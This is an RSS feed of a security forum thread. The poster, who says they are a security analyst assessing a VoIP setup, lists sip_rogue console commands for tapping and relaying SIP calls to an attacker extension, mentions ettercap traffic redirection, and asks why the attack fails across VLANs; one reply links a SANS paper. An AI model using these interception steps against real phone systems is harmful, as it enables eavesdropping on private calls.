<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>voip Application-Level Interception need some adivce/help</title>
        <description>I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-

sip_rogue
telnet localhost 6060
Connection 0
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain
10.1.101.2
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:3500@10.1.100.35
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)

In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.

I hope i can be helped with. Thanks</description>
        <link>http://sla.ckers.org/forum/read.php?25,42156,42156#msg-42156</link>
        <lastBuildDate>Wed, 22 May 2013 05:23:47 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?25,42156,42162#msg-42162</guid>
            <title>Re: voip Application-Level Interception need some adivce/help</title>
            <link>http://sla.ckers.org/forum/read.php?25,42156,42162#msg-42162</link>
            <description><![CDATA[http://www.sans.org/reading_room/whitepapers/voip/voip-security-vulnerabilities_2036<br />
<br />
Scroll to page 74 and onwards, it goes a little deeper.]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>Mobile Devices</category>
            <pubDate>Fri, 13 Jan 2012 20:11:18 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?25,42156,42156#msg-42156</guid>
            <title>voip Application-Level Interception need some adivce/help</title>
            <link>http://sla.ckers.org/forum/read.php?25,42156,42156#msg-42156</link>
            <description><![CDATA[I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The commands are :-<br />
<br />
sip_rogue<br />
telnet localhost 6060<br />
Connection 0<br />
create sipudpport port<br />
create sipdispatcher disp<br />
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain<br />
10.1.101.2<br />
create rtphandler rtp<br />
create sipendpoint hacker<br />
issue hacker accept calls<br />
issue hacker relay calls to sip:3500@10.1.100.35<br />
issue hacker tap calls to sip:4000@10.1.100.40 (the attacker)<br />
<br />
In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.<br />
<br />
I hope i can be helped with. Thanks]]></description>
            <dc:creator>lazer</dc:creator>
            <category>Mobile Devices</category>
            <pubDate>Fri, 13 Jan 2012 12:26:41 -0600</pubDate>
        </item>
    </channel>
</rss>
